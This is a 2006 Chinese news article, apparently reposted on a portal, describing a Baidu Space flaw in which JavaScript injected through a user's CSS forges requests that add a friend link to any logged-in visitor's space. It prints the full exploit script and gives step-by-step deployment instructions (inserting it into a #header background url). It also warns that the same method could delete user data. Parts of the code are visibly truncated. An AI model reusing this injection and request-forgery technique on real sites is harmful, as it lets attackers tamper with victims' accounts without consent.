百度空间存js破坏漏洞


发布时间:2006-7-25 14:50:03 来源: 网易   

百度空间上线后,很多网友为了宣传自己的百度空间,疯狂复制css代码。但与此同时也出现了百度空间的网络黑手,利用百度空间的功能,加入自己的代码,而这些代码又是恶意的,导致百度空间的用户遭遇危险。

这是一个网友发来的短信求助,原文如下:

有个黑客用javascript把我的链接改了..并威胁我如果删除连接就删除我的空间,最怕的就是这样的人..我想问您了解一下他能用同样的手段篡改我页面的其他信息吗..最好能告诉小弟对付这样的人的办法,我实在没辙了,好郁闷..谢谢..

当时笔者找到该"黑客"的空间,轻松发现其利用css代码加入js代码,然后又利用js代码的功能,分析百度空间在提交数据时的参数,构造出来一个恶意的js代码,功能是提交一个加入友情链接的请求到百度空间,导致访问该网站的已登陆百度空间用户在自己空间上自动的加一个友情链接.

下边是利用代码:

javascript:document.body.onload = function(){

var req = null;
if(window.XMLHttpRequest) req = new XMLHttpRequest();
else if(window.ActiveXObject){
var msxml = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
for(var i=0;i
try{req.overrideMimeType('text/xml')}catch(e){}
}
req.open('get','.',false);
req.send();
var s=req.responseText;
p=s.indexOf('passport.baidu.com/?logout');
if(p>0)
{
p=s.indexOf('');
if(p>0)
{
p=s.indexOf('/',p);
p2=s.indexOf(String.fromCharCode(34),p);
var user=s.substring(p+1,p2);
var name='+%B0%D9%B6%C8%BF%D5%BC%E4%B7%A2%CC%FB%D6%FA%CA%D6 ';
var link='http://hi.baidu.com/haomm';
var desc='%CA%B9%C4%E3%B5%C4%B0%D9%B6%C8%BF%D5%BC%E4%D6%A7%B3%D6html%B7%A2%CC%FB';
var url='/'+user+'/commit';
var data='ct=6&cm=1&spRef='+escape('http://hi.baidu.com/'+user)+'%2Fmodify%2Fbuddylink%2F0&spBuddyName='+escape(name)+'&spBuddyURL='+escape(link)+'&spBuddyIntro='+escape(desc);
req.open('post',url,false);
req.send(data);
}
}
}

分析:

该方法危险等级:高级.构造相应的js代码可以删除用户空间的所有数据.该漏洞目前未发现有恶意删除的现象,但已足够危险,请用户小心.

解决办法:

由于攻击者可能利用任何用户名的百度空间提交增加,删除,更改的链接,所以目前没有完美解决办法.

给已经受害者解决办法:删除恶意链接,不再在登陆的情况下访问其空间链接.

利用方法,演示及声明:

本空间加入了该漏洞代码的利用演示,使用方法:在自己空间css里面找到#header{},在里面加入上述代码即可.形式如:#header{height:200px;background:url("上文js代码");}请小心使用.

· 贱民何苦歧视农民
· 我谈卸了妆的女人
· 理想版的极品男人
· 人与人最大的差别是脖子以上的部分
· 山西临汾市尧都区:建了“天安门”又建华门
· 专家:死刑复核权收归最高法院可力避冤假错案
· 甘肃代课教师调查 教师艰辛执著震动人心 (图)
· 从给秦桧雕塑站像说起
· 日能源专家发出警告 东海冲突将是日本灭国之灾
· 秦桧夫妇站像作者不堪众骂 将作品撤出展厅(图)
商 务 专 区
我要求购 | 我要供应
怎样成为诚信联盟会员?
如何从数千条信息中脱颖而出?
如何成为本站的代理商
如何查找我想要的商机
如何与我们合作
中国行业信息网地方站CEO召集中
网络创业零风险--年薪百万不是梦!
· 情感绿洲
· 时尚空间
· 程序人生
· 飞扬九月天
· 木木之家
· amu099
· 秋天的杨树
· 行走和站着不一样
· 黄玫瑰和红玫瑰
· 青苹果的滋味∮
·专题文章·精品文章
·咨讯之窗·博客专谈
·热点新闻·博采
·社会娱乐·热点专题
·新闻纵横·热点信息
·科技财经
· 一衣带风的扮酷利器
· 十大健康水果排行榜
· 那年的雨,那年的彩虹
· 这是我第一次感到生命的可贵与卑微
· 爱情故事
· 放爱一条生路
· 千帆过尽
· 武汉美食
· 海的颜色
· 服装搭配要使用的六种“手段”
每日推荐
· 河南大学生带着捡来的妹妹求学12年[组图]
· 河南淅川山区学子杜明 叩开哈佛、牛津大门
· 新华视点:林家三姐妹悲剧凸显留守儿童窘境
· 玛雅遗迹发现1200年前杀人坑 国王惨遭杀戮
· 香港2男子经营色情网站依靠他人卖淫为生被判刑
· 印度一妇女病房内遭蚂蚁袭击 被啃掉一只眼睛
博 采
· 2005中国经典语录
· 女人 躺下做情人起来做主人
· 老农看北京奔驰
· 印度运营商选定中兴通讯合资 华为最终出局
· 科学家发现与恐惧感相关的基因
· 南极科考:“雪龙”遇大风 部分队员“提前”晕船
· 新华时评:贪食候鸟者,住嘴!
· 破解城市供暖难题:不让一户居民受冻
· 女人用液体征服男人
· 六类员工的激励技巧
· 有感于吴文俊的“实话实说”
· 散谈妓女
· 我*!一只好牛*的蚂蚁
· 不堪网络冲击 美报业负担加重纷纷准备
· 送儿子来中国学汉语 eBay女王中国
· 私企首次超国企成广东进口煤最大主力
·
相关专题
· 赵本山该不该再上〈〈春晚〉〉 · 遭裸身之辱中国女子:化成灰都认得出那些警察
· 小泉主动谈中日关系 称真没什么可担心的 · 中国妇女在马来西亚被辱恶性事件震撼大马朝野
· 比利时假球 “来自中国的神秘人物”操纵? · 海内外王氏宗亲纪念“开闽三王”入闽1120周年
【郑重声明】中国行业信息网博客公社刊载此文不代表同意其说法或描述,仅为提供更多信息,也不构成任何投资或其他建议。转载需经中国行业信息网博客公社同意并注明出处。本网站有部分文章是由网友自由上传。对于此类文章本站仅提供交流平台,不为其版权负责。如果您发现本网站上有侵犯您的知识产权的文章,请跟本站联系!
 
如果你对该条新闻有什么想法,请在下面的讨论区留下你宝贵的意见。
姓名: 请您发言时请务必尊重网上道德与我国法律法规!
登陆博客 注册新博客用户